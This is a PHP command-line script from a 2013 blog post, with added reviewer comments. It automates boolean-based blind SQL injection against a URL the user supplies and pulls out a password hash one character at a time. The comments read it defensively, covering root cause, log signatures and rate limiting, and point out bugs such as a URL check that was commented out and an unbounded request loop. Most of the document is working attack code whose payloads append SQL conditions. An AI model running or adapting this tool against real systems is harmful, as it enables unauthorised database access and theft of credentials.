Friday, 18 January 2013

Auto Blind SQL Injection



<?php

// Command-line script, published as a blog listing, that infers the value of
// one database column a character at a time by appending SQL conditions to a
// URL and checking whether a chosen word appears in the response
// (boolean-based blind SQL injection).
//
// Reviewer notes (defensive reading):
// - Root cause on the target side: every appended fragment below begins with
//   a double quote, so it only has an effect where the application pastes the
//   request parameter into a double-quoted SQL string literal. Prepared
//   statements with bound parameters turn the whole value into data.
// - Log signature: one request per guess, all to the same URL prefix, with
//   only an integer changing between consecutive requests. urlencode() leaves
//   letters and digits alone, so `length`, `substring`, `char` and `lower`
//   stay readable in the query string, and the trailing `-- -` shows up as
//   `--+-`.
// - NOTE(review): line breaks were lost when this listing was published, so a
//   trailing `//` comment runs to the end of its physical line. Read each
//   line as shown, not as the author probably laid it out.

// Banner.
echo "\r\n";echo "\r\t\r\t##\r\n";echo "\r\t\r\t#  Auto Blind SQL injector   #\r\n";echo "\r\t\r\t#  By The Jock[e]r #\r\n";echo "\r\t\r\t##\r\n";

// $page: URL prefix read from standard input; every probe below is this
// string with an urlencoded fragment appended to it.
echo "\r\nURL target :";$page = trim(fgets(STDIN));//Wait a string and valid url before continue

// URL check on the operator's input. As shown here, the text after `//` on
// the next line (including the brace block) is comment text.
if(filter_var($page, FILTER_VALIDATE_URL) !== true)//Test if var $page is correct URL{    echo "You entered an incorrect URL the program going to shut down automatically.";    exit;}

// $pattern: a word whose presence in the response body is treated as the
// "condition was true" signal. It is interpolated unescaped into the regex
// `#$pattern#` further down.
echo "\r\nDisplayed word :";$pattern = trim(fgets(STDIN));//Wait a string before continue

// $column: column name, interpolated verbatim into the appended SQL fragment.
echo "\r\nColumn target :";$column = trim(fgets(STDIN));//Wait a string before continue

// Upper bound for the length search; 98 is also the longest length the
// hash-type check at the end of the script compares against.
$lenght_max = 98;

echo "\r\n[+]Retrieving password's length...\r\n";

// Phase 1: length. For i = 0..98, fetch the URL with a `length(<column>)=i`
// condition appended and stop at the first response containing $pattern.
// That is at most 99 sequential requests differing only in the integer.
// presumably $page is an http(s) URL, so file_get_contents() performs a GET
for($i=0;$i<=$lenght_max;$i++){    $page2 = file_get_contents($page.urlencode("\" and length($column)=$i-- -"));

    // First response containing the marker word fixes the length.
    if(preg_match("#$pattern#",$page2))    {        $lenght = $i;        echo "\r\nThe password's length is $lenght.\r\n";        break;    }}

// Accumulates the recovered characters.
$final_pass = "";

// Candidate character codes start at 20. $char_max is assigned here but is
// not referenced anywhere else in this listing.
$char_min = 20;$char_max = 140;

// $char: current candidate code; $x: 1-based position being tested.
$char = $char_min;$x = 1;

echo "\r\n[+]Retrieving password's hash...\r\n";

echo "\r\nFinal password is : ";

// Phase 2: content. One request per (position, candidate code) pair, with a
// `substring(<column>,x,1)` / `char(<code>)` comparison appended. A response
// containing $pattern appends the lower-cased character and moves to the
// next position. After a match $char is reset to $char_min and then
// incremented, so later positions start at 21.
// NOTE(review): the loop has no upper bound on $char, so a position that
// never matches produces an unbounded run of requests against the target;
// per-client rate limiting on the affected endpoint would cap it.
while($x <= $lenght) {    $page3 = file_get_contents($page.urlencode("\" and lower(substring($column,$x,1)=char($char))-- -"));    if(preg_match("#$pattern#", $page3))    {        $final_pass.= strtolower(chr($char));        echo strtolower(chr($char));        $x ++;        $char = $char_min;    }    $char++;}

$lenght_pass = $lenght;

echo "\r\n\r\n[+]Retrieving hash type...\r\n";

// Phase 3: label the recovered value by its length and, for some formats, a
// pattern test on the value. Purely local; no further requests are made.
// Several labels (sha1, md5, MySQL) are fast hash formats; password storage
// with password_hash()/password_verify() avoids them.
// NOTE(review): $type is only assigned inside a matching branch, so the final
// echo reads an undefined variable when no branch matches.
if($lenght_pass == 40){    $type = "sha1";}elseif ($lenght_pass == 32) {    $type = "md5";}elseif ($lenght_pass == 13) {

    // Length 13 above; next test: length 34 plus a `$1$` pattern.
    $type = "DES(Unix)";}elseif (preg_match("#\\$1\\$#",$final_pass) AND $lenght_pass == 34) {

    // Next test: length 37 plus a `$apr1$` pattern.
    $type = "MD5(Unix)";}elseif (preg_match("#\\\$apr1\\$#",$final_pass) AND $lenght_pass == 37) {

    // Next test: length 34 plus a `$h$` pattern (value was lower-cased above).
    $type = "MD5(APR)";}elseif (preg_match("#\\\$h\\$#",$final_pass) AND $lenght_pass == 34) {

    // Next test: length 34 plus a `$p$` pattern.
    $type = "MD5(phpBB3)";}elseif (preg_match("#\\\$p\\$#",$final_pass) AND $lenght_pass == 34) {

    $type = "MD5(Wordpress)";}

// Length 16 is labelled "MySQL".
elseif ($lenght_pass == 16) {

    // Next test: length 41 plus a pattern apparently meant to look for `*`.
    $type = "MySQL";}elseif (preg_match("#\\\*#", $final_pass) AND $lenght_pass == 41) {

    // This branch upper-cases the recovered value; next test: length 55 plus
    // a `$5$` pattern.
    $type = "MySQL5";    $final_pass = strtoupper($final_pass);}elseif (preg_match("#\\$5\\$#", $final_pass) AND $lenght_pass == 55) {

    // Last test: length 98 plus a `$6$` pattern.
    $type = "SHA-256(Unix)";}elseif(preg_match("#\\$6\\$#", $final_pass) AND $lenght_pass == 98){    $type = "SHA-512(Unix)";}

// Prints the recovered value with the label chosen above.
echo "\r\nHash type for $final_pass is ".$type.".\r\n";

?>
